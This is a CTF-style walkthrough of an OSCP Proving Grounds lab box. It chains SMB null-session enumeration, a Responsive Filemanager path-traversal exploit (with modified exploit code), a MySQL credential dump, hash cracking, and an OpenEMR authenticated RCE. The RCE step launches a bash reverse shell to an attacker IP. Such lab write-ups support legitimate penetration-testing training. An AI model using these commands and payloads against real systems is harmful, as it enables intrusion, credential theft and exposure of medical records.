I did this OSCP Proving Grounds box in preparation for the OSCP exam. Hope you enjoy, and if there is any way I could improve these walkthroughs by either elaborating more or making it more concise, please let me know. Thanks!

NMAP

[+] Let’s start with identifying all open ports and then enumerate deeper with specific nmap options

export $ip=192.168.160.145 # an alias so I don't have to write the full ip everytime and also have to remember it.

nmap -p- -T4 -- open $ip

rustscan -A $ip --ulimit 5000 # super port enumeration tool that verifies if my initial scan with nmap is accurate.

nmap -A -T4 -p 80,445 $ip -oN nmap.fulltcp

Port Enumeration

[+] I always leave port 80/443 last because they’re are many paths you can take with it. Our nmap scan results show that it had a successul connection as the user gues so let’s test smb null session.

smbclient -N -L \\\\192.168.160.145

Great we have list the shares via a null session. There is also a non-default share named docs

[+] I can try connecting to the share and then download all files to our kali machine

smbclient \\\\192.168.160.145\\docs
mget *

[+] We got the pdf files. Now its time to open them and see if they have any credentials, directories/domains we are unaware of, or any applications, tools, software, or version information we can leverage to gain a foothold.

[+] Let’s do a quick Google search about what OpenEMR is even about.

Based on this description, the target is most likely using this software for their business needs.

[+] Even though we do not have a version number, we still have the name of the software and doing a quick searchsploit can give us valuable information.

searchsploit "OpenEMR"

Woah, we hit a goldmine.

The good news is that this indicates OpenEMR is most likely vulnerable to some exploit. The bad is that we have a lot of possible avenues. Let’s check out port 80 and see if we can narrow the search. It could lead to the login page and have the version number.

Web Enumeration

[+] I like to start some automated scans and leave it running in the background while I work on my manual enumeration methodology. I’ll typically start a directory busting tool, and a vulnerability scanner like Nikto.

nikto -h http://192.168.160.145 # vulnerability scanner

feroxbuster -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # Directory 
busting tools

Don’t see anything really stands out.

Feroxbuster does recursive searches by default and I have really started to like this tool. We see the path to the openemr application, along with many other files. We could probably search openemr on GitHub and get a visual idea of what all these files are and what contents are within it.

Also get this intersting filemanager directory.

[+] I think it’s a good time to actually navigate the site and see what’s available to us.

We get some possible users and also the domain name that we could add to our /etc/hosts file.

[+] Let’s check out our OpenEMR login portal for any leaked information like a version number.

Login page nor source code reveals the current version.
Default/common credentials also do not work here.

[+] At this point, trying to understand the software that is installed, its files, the directory structure, and trying to identify if their configuration file holds any default credentials is our logical next step.

very intersting, we have a mysql server in the mix now and we also have the default credentials to access it. However, we cannot access it since we do not have a foothold of the system.

Exploitation

[+] Investigating the hit on the filemanager directory we have file upload functionality which is great and we also get a version number.

Version v.9.13.4

[+] Search for exploits on this software

searchsploit "responsive filemanager"
searchsploit -m 49359 # downloads the EBDID exploit

We get a hit for our exact version – Path Traversal

[+] Let’s check out how our exploit functions and what requirements it needs to execute successfully.

cat 49359.py

It looks like we need a PHPSESSID which is fairly simple to get

Looking at the functions used in this exploit, it is copying our file, pasting it in the path we specify, and then outputs the contents of the file.

[+] Getting the PHPSESSID

curl -s -D - http://192.168.160.145/filemanager/ | grep PHPSESSID
# -s is silent mode
# -D dumps the headers. PHPSESSID is found within the headers

python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /etc/passwd

The exploit works, and mysql is indeed in the /etc/passwd file.

[+] With the POC working, let’s try retrieving the sqlconf.php file.

python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /var/www/openemr/sites/default/sqlconf.php

We know the exploit works, but we did not get to “read” the contents of the file. It seems like the copy/paste functions worked but something occurred during the read function.

[+] Going back through my initial findings, our smbclient connection showed a docs share we are able to read that had 2 files in it. These are the exact same files that are found in the path /filemanager/documents. We can modify the paste function to point to Documents and see if we can see the file via our smb null session.

def paste_clipboard(url, session_cookie):
	headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
	url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
	r = requests.post(
	url_paste, data="path=/Documents", headers=headers)
	return r.status_code

“Paste_clipboard” path modified.

[+] Let’s run the exploit and check via smb.

python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /var/www/openemr/sites/default/sqlconf.php #exploit

smbclient \\\\192.168.160.145\\docs # cannot to null session
get sqlconf.php # downloads file to our machine
!cat sqlconf.php # the ! mark let's us run native commands wihthin the smb session

We got some creds!

[+] Let’s connect to the MySQL DB and try to dump the creds to the openemr login portal.

mysql -h 192.168.160.145 -u openemr -D openemr -p --skip-ssl # connect to mysql server and the database specified
show tables; 
select * FROM users_secure;

[+] We can identify the hash type and then use john to crack the hash

echo '$2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC' > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

John The Ripper automatically detected the hash type and proceeded to crack it. Our credentials are admin:thedoctor

[+] These creds get us into the openemr login portal and we identify the version number in the About section.

[+] This is where the cyclical process of pentesting occurs, we have to look for any exploits for this version number. We did find a lot of exploits from one of our initial searchsploits on openemr but now we were able to drastically narrow down our search.

Initial Search.

After Identifying the version number.

[+] Since we have creds, the Authenticated RCE exploits should be able to get us a revshell and a foothold into the system.

searchsploit -m 45161
mousepad 45161.py #open exploit identify/modify payload.
head -n 17 # allows us to see the example usage so we could just copy and replace the payload.
nc -nvlp 4444 # set up listener
python2 45161.py http://192.168.160.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.45.190/4444 0>&1' # exploit and payload being executed.

We’re In

Privilege Escalation

[+] We have the password for our admin user. Let’s test su for a quick win.

su

[+] We can elevate our tty and see if that works.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Pwn3d!

Apex Walkthrough

NMAP

Port Enumeration

Web Enumeration

Exploitation

Privilege Escalation